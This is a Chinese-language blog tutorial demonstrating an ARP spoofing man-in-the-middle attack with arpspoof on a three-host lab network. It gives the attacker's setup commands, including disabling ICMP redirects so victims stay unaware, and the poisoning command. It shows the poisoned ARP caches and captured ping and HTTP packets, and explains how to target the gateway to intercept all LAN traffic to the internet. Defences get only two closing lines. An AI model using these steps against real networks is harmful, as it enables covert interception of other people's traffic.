ARP 欺骗实现原理：

通过伪造（未经请求）ARP 应答，从而改变受害端主机 ARP 表中的 IP-MAC 映射关系，将来自 LAN 上的受害端主机的数据包重定向到 LAN 上的另一台主机（攻击端，arpspoof 运行端），从而实现流量劫持。

本方案扩展可实现：劫持内网任意主机到 internet 的所有流量，而用户无感知流量被截获

环境介绍

类型	名称	IP 地址	MAC 地址	接口名称
受害端	hostA	192.168.122.181	52:54:00:2b:f4:83	ens3
受害端	hostB	192.168.122.183	52:54:00:e8:2a:36	ens3
攻击端	jiawen	192.168.122.86	52:54:00:d5:0d:43	eth0

攻击端环境准备

1、启用路由转发，即转发受害端主机之间的任意流量

sysctl -w net.ipv4.conf.all.forwarding=1

2、攻击端系统防火墙放行 forward 流量

# 启用 public 区域内转发，攻击端接口 eth0 所在 zone
firewall-cmd --permanent --zone=public --add-forward

3、禁止攻击端发送 redirect 消息，避免受害端主机发现流量被劫持

sysctl -w net.ipv4.conf.all.send_redirects=0

如果不禁用配置项 send_redirects ，则受害端主机 ping 检测会有异常（容易被发现）

ping 192.168.122.183
#> PING 192.168.122.183 (192.168.122.183) 56(84) bytes of data.
#> From 192.168.122.86 icmp_seq=1 Redirect Host(New nexthop: 192.168.122.183)
#> 64 bytes from 192.168.122.183: icmp_seq=1 ttl=63 time=1.07 ms
#> From 192.168.122.86 icmp_seq=2 Redirect Host(New nexthop: 192.168.122.183)
#> 64 bytes from 192.168.122.183: icmp_seq=2 ttl=63 time=0.710 ms
#> From 192.168.122.86 icmp_seq=3 Redirect Host(New nexthop: 192.168.122.183)
#> 64 bytes from 192.168.122.183: icmp_seq=3 ttl=63 time=0.823 ms
#> From 192.168.122.86 icmp_seq=4 Redirect Host(New nexthop: 192.168.122.183)
#> 64 bytes from 192.168.122.183: icmp_seq=4 ttl=63 time=0.867 ms
#> ....

攻击端执行 ARP 投毒

1、攻击端执行 arpspoof 命令，开始 arp 投毒

sudo arpspoof -i eth0 -t 192.168.122.181 -r 192.168.122.183
#> 52:54:0:d5:d:43 52:54:0:2b:f4:83 0806 42: arp reply 192.168.122.183 is-at 52:54:0:d5:d:43
#> 52:54:0:d5:d:43 52:54:0:2b:f4:83 0806 42: arp reply 192.168.122.183 is-at 52:54:0:d5:d:43
#> 52:54:0:d5:d:43 52:54:0:2b:f4:83 0806 42: arp reply 192.168.122.183 is-at 52:54:0:d5:d:43
#> ...

扩展：
1、选项 -t 可设置多次，从而截获多个主机与 192.168.122.183 之间的流量
2、选项 -t 未指定时，且 192.168.122.183 替换为内网网关地址，从而截获内网所有主机到 internet 之间的所有流量。

2、攻击端接口 eth0 mac 地址

root@jiawen:~# ifconfig eth0 |grep ether
ether 52:54:00:d5:0d:43  txqueuelen 1000  (Ethernet)

3、受害端 hostA arp 缓存

[root@hostA ~]# arp -n -i ens3
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.122.1            ether   52:54:00:2b:9a:d1   C                     ens3
192.168.122.183          ether   52:54:00:d5:0d:43   C                     ens3

通信对端 hostB 192.168.122.183 对应 mac 变更为攻击端接口 mac 52:54:00:d5:0d:43。即 arp 投毒成功

4、同理，受害端 hostB arp 缓存也已被投毒

[root@hostB ~]# arp -n -i ens3
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.122.1            ether   52:54:00:2b:9a:d1   C                     ens3
192.168.122.181          ether   52:54:00:d5:0d:43   C                     ens3

hostA 和 hostB 通信测试

1、攻击端抓包受害主机之间的 ping 包

03:44:33.785225 IP 192.168.122.181 > 192.168.122.183: ICMP echo request, id 56, seq 1, length 64
03:44:33.785246 IP 192.168.122.181 > 192.168.122.183: ICMP echo request, id 56, seq 1, length 64
03:44:33.785738 IP 192.168.122.183 > 192.168.122.181: ICMP echo reply, id 56, seq 1, length 64
03:44:33.785756 IP 192.168.122.183 > 192.168.122.181: ICMP echo reply, id 56, seq 1, length 64

2、攻击端抓包受害主机之间的 http 包

03:47:34.951301 IP 192.168.122.181.52932 > 192.168.122.183.http: Flags [S], seq 2120799285, win 29200, options [mss 1460,sackOK,TS val 1963005399 ecr 0,nop,wscale 7], length 0
03:47:34.951324 IP 192.168.122.181.52932 > 192.168.122.183.http: Flags [S], seq 2120799285, win 29200, options [mss 1460,sackOK,TS val 1963005399 ecr 0,nop,wscale 7], length 0
03:47:34.951934 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [S.], seq 1967301846, ack 2120799286, win 28960, options [mss 1460,sackOK,TS val 1236436413 ecr 1963005399,nop,wscale 7], length 0
03:47:34.951955 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [S.], seq 1967301846, ack 2120799286, win 28960, options [mss 1460,sackOK,TS val 1236436413 ecr 1963005399,nop,wscale 7], length 0
03:47:34.952401 IP 192.168.122.181.52932 > 192.168.122.183.http: Flags [.], ack 1, win 229, options [nop,nop,TS val 1963005400 ecr 1236436413], length 0
03:47:34.952402 IP 192.168.122.181.52932 > 192.168.122.183.http: Flags [P.], seq 1:80, ack 1, win 229, options [nop,nop,TS val 1963005400 ecr 1236436413], length 79: HTTP: GET / HTTP/1.1
03:47:34.952421 IP 192.168.122.181.52932 > 192.168.122.183.http: Flags [.], ack 1, win 229, options [nop,nop,TS val 1963005400 ecr 1236436413], length 0
03:47:34.952444 IP 192.168.122.181.52932 > 192.168.122.183.http: Flags [P.], seq 1:80, ack 1, win 229, options [nop,nop,TS val 1963005400 ecr 1236436413], length 79: HTTP: GET / HTTP/1.1
03:47:34.952995 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [.], ack 80, win 227, options [nop,nop,TS val 1236436414 ecr 1963005400], length 0
03:47:34.953013 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [.], ack 80, win 227, options [nop,nop,TS val 1236436414 ecr 1963005400], length 0
03:47:34.954172 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [P.], seq 1:239, ack 80, win 227, options [nop,nop,TS val 1236436415 ecr 1963005400], length 238: HTTP: HTTP/1.1 200 OK
03:47:34.954191 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [P.], seq 1:239, ack 80, win 227, options [nop,nop,TS val 1236436415 ecr 1963005400], length 238: HTTP: HTTP/1.1 200 OK
03:47:34.954416 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [P.], seq 239:854, ack 80, win 227, options [nop,nop,TS val 1236436415 ecr 1963005400], length 615: HTTP
03:47:34.954427 IP 192.168.122.183.http > 192.168.122.181.52932: Flags [P.], seq 239:854, ack 80, win 227, options [nop,nop,TS val 1236436415 ecr 1963005400], length 615: HTTP
....

防范 ARP 攻击

使用 ARP 防火墙：监控和检测网络中的 ARP 流量，及时发现并阻止异常 ARP 请求和响应

启用 ARP 检测功能：一些网络设备具有 ARP 检测功能，可以检测到 ARP 欺骗行为并自动阻断攻击者的连接

码字不易，若觉得本文对你有用，欢迎点赞 👍、分享 🚀 ，相关技术热点时时看🔥🔥🔥​​​…